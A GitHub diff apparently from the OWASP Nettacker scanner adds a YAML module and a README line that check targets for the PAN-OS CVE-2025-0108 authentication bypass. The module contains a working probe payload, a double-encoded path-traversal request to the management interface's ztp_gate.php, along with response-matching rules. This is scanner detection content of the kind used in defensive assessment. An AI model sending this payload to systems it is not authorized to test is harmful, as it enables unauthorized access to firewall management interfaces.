File tree Expand file tree Collapse file tree 2 files changed +60
-0
lines changed Expand file tree Collapse file tree 2 files changed +60
-0
lines changed Original file line number Diff line number Diff line change @@ -143,6 +143,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
143143* '** msexchange_cve_2021_26855** ' - check the target for MS Exchange SSRF CVE-2021 -26855 (proxylogon/hafnium)
144144* '** http_cors_vuln** ' - check the web server for overly-permissive CORS (header 'Access-Control-Allow-Origin'=* )
145145* '** options_method_enabled_vuln** ' - check if OPTIONS method is enabled on the web server
146+ * '** paloalto_panos_cve_2025_0108_vuln** - check the target for PaloAlto PAN-OS CVE-2025 -0108 vulnerability
146147* '** ProFTPd_bypass_sqli_protection_vuln** ' - check ProFTPd for CVE-2009 -0543
147148* '** ProFTPd_cpu_consumption_vuln** ' - check ProFTPd for CVE-2008 -7265
148149* '** ProFTPd_directory_traversal_vuln** ' - check ProFTPd for CVE-2010 -3867
Original file line number Diff line number Diff line change 1+ info :
2+ name : paloalto_panos_cve_2025_0108_vuln
3+ author : OWASP Nettacker team
4+ severity : 8.8
5+ description : CVE-2025-0108 is an authentication bypass in the Palo Alto Networks PAN-OS software, which enables an unauthenticated attacker with network access to the management web interface to bypass the authentication
6+ reference :
7+ - https://security.paloaltonetworks.com/CVE-2025-0108
8+ - https://www.assetnote.io/resources/research/nginx-apache-path-confusion-to-auth-bypass-in-pan-os
9+ - https://www.bleepingcomputer.com/news/security/hackers-exploit-authentication-bypass-in-palo-alto-networks-pan-os/
10+ profiles :
11+ - vuln
12+ - vulnerability
13+ - http
14+ - high_severity
15+ - cve
16+ - paloalto
17+ - paloalto_panos
18+ - panos
19+
20+
21+ payloads :
22+ - library : http
23+ steps :
24+ - method : get
25+ timeout : 3
26+ headers :
27+ User-Agent : " {user_agent}"
28+ allow_redirects : false
29+ ssl : false
30+ url :
31+ nettacker_fuzzer :
32+ input_format : " {{schema}}://{target}:{{ports}}/{{paths}}"
33+ prefix : " "
34+ suffix : " "
35+ interceptors :
36+ data :
37+ paths :
38+ - " unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"
39+ schema :
40+ - " http"
41+ - " https"
42+ ports :
43+ - 80
44+ - 443
45+ - 4443
46+ - 8443
47+ response :
48+ condition_type : and
49+ conditions :
50+ status_code :
51+ regex : " 200"
52+ reverse : false
53+ header :
54+ Content-Type :
55+ regex : text/html
56+ reverse : false
57+ content :
58+ regex : " Zero Touch Provisioning"
59+ reverse : false
You can’t perform that action at this time.
0 commit comments